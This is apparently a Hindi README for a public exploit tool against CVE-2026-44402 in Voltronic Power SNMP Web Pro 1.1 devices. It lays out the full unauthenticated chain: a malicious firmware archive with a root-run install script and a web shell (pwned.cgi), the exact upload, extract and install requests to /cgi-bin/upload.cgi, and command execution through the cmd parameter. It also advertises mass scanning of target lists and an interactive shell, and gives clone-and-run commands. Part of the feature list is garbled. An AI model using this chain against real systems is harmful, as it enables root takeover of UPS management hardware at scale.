
CVE-2026-44402 के लिए एक्सप्लॉइट जो Voltronic Power SNMP Web Pro 1.1 को लक्षित करता है, जो दुर्भावनापूर्ण फर्मवेयर अपलोड के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन को सक्षम बनाता है। इंटरैक्टिव शेल के साथ एकल-लक्ष्य और बड़े पैमाने पर स्कैनिंग का समर्थन करता है।
गंभीर बिना प्रमाणीकरण रिमोट कोड निष्पादन (CVSS 9.8) — Voltronic Power SNMP Web Pro 1.1
यह टूल CVE-2026-44402 का शोषण करता है, जो Voltronic Power SNMP Web Pro 1.1 डिवाइस में एक कमजोरी है जो बिना प्रमाणीकरण वाले हमलावरों को दुर्भावनापूर्ण फर्मवेयर संग्रह अपलोड करने और upload.cgi एंडपॉइंट के माध्यम से रूट के रूप में सिस्टम कमांड निष्पादित करने की अनुमति देती है।
| गुण | मान |
|---|
| CVE ID | CVE-2026-44402 |
| CVSS स्कोर | 9.8 (गंभीर) |
| CWE | CWE-434 — खतरनाक प्रकार की फ़ाइल का असीमित अपलोड |
| प्रभावित उत्पाद | Voltronic Power SNMP Web Pro 1.1 |
| प्रमाणीकरण आवश्यक | नहीं (बिना प्रमाणीकरण) |
| हमला वेक्टर | नेटवर्क-आधारित (रिमोट) |
| विशेषाधिकार | रूट-स्तरीय RCE |
कमजोरी फर्मवेयर अपडेट कार्यक्षमता (upload.cgi) में मौजूद है। एंडपॉइंट:
दुर्भावनापूर्ण संग्रह बनाएं
upgrade/install.sh — इंस्टॉलेशन स्क्रिप्टupgrade/pwned.cgi — वेब शेलसंग्रह अपलोड करें → POST /cgi-bin/upload.cgi?name=upgrade&?params=upload
"ACK"संग्रह निकालें → GET /cgi-bin/upload.cgi?name=upgrade&?params=extract
"ACK"इंस्टॉल करें → GET /cgi-bin/upload.cgi?name=upgrade&?params=install
install.sh को रूट के रूप में निष्पादित किया जाता है"ACK"वेब शेल सक्रिय → POST /cgi-bin/pwned.cgi
cmd पैरामीटर के साथ कमांड निष्पादित करें → RCE! 🚀-u)-f targets.txt)-t 20) — तेज़ समानांतर प्रोसेसिंग--shell) cd समर्थन के साथurl | output प्रारूप--proxy)--timeout)-v)requests और prompt_toolkit के अलावा कोई बाहरी निर्भरता नहीं# रिपॉजिटरी क्लोन करें
git clone https://github.com/0xCyp1337/CVE-2026-44402.git
cd CVE-2026-44402
python3 CVE-2026-44402.py